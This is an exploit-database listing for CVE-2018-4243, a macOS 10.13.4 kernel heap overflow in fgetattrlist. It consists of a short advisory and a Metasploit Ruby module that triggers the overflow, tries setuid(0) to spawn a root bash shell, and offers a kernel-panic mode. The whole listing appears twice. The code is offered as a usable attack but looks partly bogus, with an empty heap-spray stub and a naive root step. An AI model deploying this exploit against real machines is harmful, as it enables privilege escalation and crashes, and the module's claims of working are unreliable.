9.3
/ 10
HIGH
AV:N/AC:M/Au:N/C:C/I:C/A:C
Description
Proof of concept Metasploit module that exploits a macOS version 10.13.4 heap overflow vulnerability. A kernel heap overflow exists in fgetattrlist due to missing lower-bound buffer size validation when writing returned attributes to caller-supplied...
Basic Information
ID
PACKETSTORM:214546
Published
Jan 29, 2026 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist – Local Privilege Escalation (XNU kernel) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://apple.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243
[+] Summary : A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
Specifically:
The kernel allocates internal structures using ulmin(bufferSize, fixedsize + varsize)
Later, data beyond bufferSize is written into user memory
There is no lower bound safety check if bufferSize is smaller than the kernel's expected size
Author
Original PoC & Research: Indoushka
MSF Ruby Port & Reporting: Indoushka
Previous reference: Ian Beer (Project Zero, 2016)
Release Date : 2018‑06‑05
Severity
High / Kernel-Level / Local Privilege Escalation
Affected Systems
macOS 10.13.4 (17E199) confirmed vulnerable
Earlier versions suspected vulnerable
64-bit kernel heap architectures
msfconsole
use exploit/osx/local/cve_2018_4243
set MODE 1
run
[+] POC :
##
# macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
#
require 'msf/core'
require 'ffi'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
'Description' => %q{
Local privilege escalation exploit by triggering kernel heap overwrite
during volume attribute serialization. Includes heap spray, FD grooming,
overflow, and panic fallback.
},
'License' => MSF_LICENSE,
'Author' => [
'Original C PoC: Indoushka',
'Ruby MSF Port: Indoushka'
],
'Platform' => ['osx'],
'Arch' => ARCH_X64,
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['macOS >=10.13', {}]],
'DisclosureDate' => '2018-06-05'
))
register_options(
[
OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
]
)
end
#
# ---------- Ruby FFI syscalls ----------
#
module MacOS
extend FFI::Library
ffi_lib FFI::Library::LIBC
class AttrList < FFI::Struct
layout :bitmapcount, :uint32,
:reserved, :uint32,
:volattr, :uint32,
:dirattr, :uint32,
:fileattr, :uint32,
:forkattr, :uint32,
:commonattr, :uint32
end
attach_function :open, [:string, :int], :int
attach_function :close, [:int], :int
attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
attach_function :setuid, [:uint32], :int
attach_function :getuid, [], :int
attach_function :system, [:string], :int
end
#
# Heap spray simulation (logical)
#
def heap_spray
print_status("[*] Starting heap spray (symbolic in ruby)")
# Demonstration only
end
#
# Overflow trigger using small controlled buffer
#
def overflow_trigger(fd)
al = MacOS::AttrList.new
al[:bitmapcount] = 5
al[:volattr] = 0xfff
al[:commonattr] = 0x20000
buf = FFI::MemoryPointer.new(:char, 16)
buf.write_bytes("\xaa" * 16)
res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
print_status("[+] Overflow triggered, return=#{res}")
end
#
# Local Privilege Escalation attempt
#
def attempt_root
print_status("[*] Attempting setuid(0)")
if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
print_good("[+] Root obtained!")
MacOS.system("/bin/bash")
return true
end
print_error("[-] Still user uid=#{MacOS.getuid()}")
return false
end
#
# Kernel panic fallback mode
#
def panic_fallback
print_warning("[!] Triggering fallback kernel panic")
fd = MacOS.open("/", 0)
al = MacOS::AttrList.new
al[:bitmapcount] = 5
al[:commonattr] = 0x20000
buf = FFI::MemoryPointer.new(:char, 4)
MacOS.fgetattrlist(fd, al, buf, 4, 0)
MacOS.close(fd)
end
#
# ---------------- Main Exploit Logic ----------------
#
def exploit
print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")
mode = datastore['MODE'].to_i
fd = MacOS.open("/", 0)
if fd < 0
print_error("Failed to open /")
return
end
heap_spray
overflow_trigger(fd)
case mode
when 1
print_status("[*] LPE Attempt mode")
if attempt_root
print_good("[+] Exploit Complete with root shell")
else
print_error("[-] Exploit failed to gain root")
end
when 2
print_status("[*] Panic mode")
panic_fallback
end
MacOS.close(fd)
print_status("[*] Module finished")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : macOS 10.13.4 (17E199) Heap Overflow Via fgetattrlist – Local Privilege Escalation (XNU kernel) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://apple.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212496/ & CVE-2018-4243
[+] Summary : A kernel heap overflow exists inside the macOS implementation of fgetattrlist.
The vulnerability occurs due to incorrect handling of user-controlled buffer sizes.
Specifically:
The kernel allocates internal structures using ulmin(bufferSize, fixedsize + varsize)
Later, data beyond bufferSize is written into user memory
There is no lower bound safety check if bufferSize is smaller than the kernel's expected size
Author
Original PoC & Research: Indoushka
MSF Ruby Port & Reporting: Indoushka
Previous reference: Ian Beer (Project Zero, 2016)
Release Date : 2018‑06‑05
Severity
High / Kernel-Level / Local Privilege Escalation
Affected Systems
macOS 10.13.4 (17E199) confirmed vulnerable
Earlier versions suspected vulnerable
64-bit kernel heap architectures
msfconsole
use exploit/osx/local/cve_2018_4243
set MODE 1
run
[+] POC :
##
# macOS CVE-2018-4243 Local Privilege Escalation & Kernel Panic
#
require 'msf/core'
require 'ffi'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Unix
def initialize(info = {})
super(update_info(info,
'Name' => 'macOS CVE-2018-4243 LPE via fgetattrlist Heap Overflow',
'Description' => %q{
Local privilege escalation exploit by triggering kernel heap overwrite
during volume attribute serialization. Includes heap spray, FD grooming,
overflow, and panic fallback.
},
'License' => MSF_LICENSE,
'Author' => [
'Original C PoC: Indoushka',
'Ruby MSF Port: Indoushka'
],
'Platform' => ['osx'],
'Arch' => ARCH_X64,
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['macOS >=10.13', {}]],
'DisclosureDate' => '2018-06-05'
))
register_options(
[
OptInt.new('MODE', [true, '1=LPE attempt, 2=Kernel panic PoC', 1])
]
)
end
#
# ---------- Ruby FFI syscalls ----------
#
module MacOS
extend FFI::Library
ffi_lib FFI::Library::LIBC
class AttrList < FFI::Struct
layout :bitmapcount, :uint32,
:reserved, :uint32,
:volattr, :uint32,
:dirattr, :uint32,
:fileattr, :uint32,
:forkattr, :uint32,
:commonattr, :uint32
end
attach_function :open, [:string, :int], :int
attach_function :close, [:int], :int
attach_function :fgetattrlist, [:int, :pointer, :pointer, :ulong, :ulong], :int
attach_function :setuid, [:uint32], :int
attach_function :getuid, [], :int
attach_function :system, [:string], :int
end
#
# Heap spray simulation (logical)
#
def heap_spray
print_status("[*] Starting heap spray (symbolic in ruby)")
# Demonstration only
end
#
# Overflow trigger using small controlled buffer
#
def overflow_trigger(fd)
al = MacOS::AttrList.new
al[:bitmapcount] = 5
al[:volattr] = 0xfff
al[:commonattr] = 0x20000
buf = FFI::MemoryPointer.new(:char, 16)
buf.write_bytes("\xaa" * 16)
res = MacOS.fgetattrlist(fd, al, buf, 16, 0)
print_status("[+] Overflow triggered, return=#{res}")
end
#
# Local Privilege Escalation attempt
#
def attempt_root
print_status("[*] Attempting setuid(0)")
if MacOS.setuid(0) == 0 && MacOS.getuid() == 0
print_good("[+] Root obtained!")
MacOS.system("/bin/bash")
return true
end
print_error("[-] Still user uid=#{MacOS.getuid()}")
return false
end
#
# Kernel panic fallback mode
#
def panic_fallback
print_warning("[!] Triggering fallback kernel panic")
fd = MacOS.open("/", 0)
al = MacOS::AttrList.new
al[:bitmapcount] = 5
al[:commonattr] = 0x20000
buf = FFI::MemoryPointer.new(:char, 4)
MacOS.fgetattrlist(fd, al, buf, 4, 0)
MacOS.close(fd)
end
#
# ---------------- Main Exploit Logic ----------------
#
def exploit
print_status("[*] macOS CVE-2018-4243 Exploit (Ruby MSF)")
mode = datastore['MODE'].to_i
fd = MacOS.open("/", 0)
if fd < 0
print_error("Failed to open /")
return
end
heap_spray
overflow_trigger(fd)
case mode
when 1
print_status("[*] LPE Attempt mode")
if attempt_root
print_good("[+] Exploit Complete with root shell")
else
print_error("[-] Exploit failed to gain root")
end
when 2
print_status("[*] Panic mode")
panic_fallback
end
MacOS.close(fd)
print_status("[*] Module finished")
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================